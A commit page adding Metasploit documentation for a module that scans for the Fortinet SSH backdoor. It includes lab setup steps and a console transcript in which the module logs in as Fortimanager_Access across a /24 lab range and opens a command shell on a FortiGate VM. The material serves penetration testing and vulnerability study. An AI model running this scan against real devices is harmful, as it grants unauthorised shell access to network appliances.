Browse Source

Add module doc

William Vu 1 year ago
parent
commit
a9d6845f25
1 changed files with 63 additions and 0 deletions
  1. 63
    0
      documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md

+ 63
- 0
documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md View File

@@ -0,0 +1,63 @@
1
+## Intro
2
+
3
+This module scans for the Fortinet SSH backdoor and creates sessions.
4
+
5
+## Setup
6
+
7
+1. `git clone https://github.com/nixawk/labs`
8
+2. Import `FortiGate-Backdoor-VM/FortiGate-VM.ovf` into VMware
9
+3. <http://help.fortinet.com/fweb/580/Content/FortiWeb/fortiweb-admin/network_settings.htm>
10
+
11
+## Usage
12
+
13
+```
14
+msf5 > use auxiliary/scanner/ssh/fortinet_backdoor
15
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24
16
+rhosts => 192.168.212.0/24
17
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100
18
+threads => 100
19
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run
20
+
21
+[*] Scanned  54 of 256 hosts (21% complete)
22
+[+] 192.168.212.128:22 - Logged in as Fortimanager_Access
23
+[*] Scanned  65 of 256 hosts (25% complete)
24
+[*] Scanned  78 of 256 hosts (30% complete)
25
+[*] Command shell session 1 opened (192.168.212.1:40605 -> 192.168.212.128:22) at 2018-02-21 21:35:11 -0600
26
+[*] Scanned 104 of 256 hosts (40% complete)
27
+[*] Scanned 141 of 256 hosts (55% complete)
28
+[*] Scanned 154 of 256 hosts (60% complete)
29
+[*] Scanned 180 of 256 hosts (70% complete)
30
+[*] Scanned 205 of 256 hosts (80% complete)
31
+[*] Scanned 240 of 256 hosts (93% complete)
32
+[*] Scanned 256 of 256 hosts (100% complete)
33
+[*] Auxiliary module execution completed
34
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1
35
+[*] Starting interaction with 1...
36
+
37
+FortiGate-VM # get system status
38
+Version: FortiGate-VM v5.0,build0228,130809 (GA Patch 4)
39
+Virus-DB: 16.00560(2012-10-19 08:31)
40
+Extended DB: 1.00000(2012-10-17 15:46)
41
+Extreme DB: 1.00000(2012-10-17 15:47)
42
+IPS-DB: 4.00345(2013-05-23 00:39)
43
+IPS-ETDB: 0.00000(2000-00-00 00:00)
44
+Serial-Number: FGVM00UNLICENSED
45
+Botnet DB: 1.00000(2012-05-28 22:51)
46
+License Status: Evaluation license expired
47
+Evaluation License Expires: Thu Jan 28 13:05:41 2016
48
+BIOS version: 04000002
49
+Log hard disk: Need format
50
+Hostname: FortiGate-VM
51
+Operation Mode: NAT
52
+Current virtual domain: root
53
+Max number of virtual domains: 10
54
+Virtual domains status: 1 in NAT mode, 0 in TP mode
55
+Virtual domain configuration: disable
56
+FIPS-CC mode: disable
57
+Current HA mode: standalone
58
+Branch point: 228
59
+Release Version Information: GA Patch 4
60
+System time: Wed Feb 21 13:13:43 2018
61
+
62
+FortiGate-VM #
63
+```

Loading…
Cancel
Save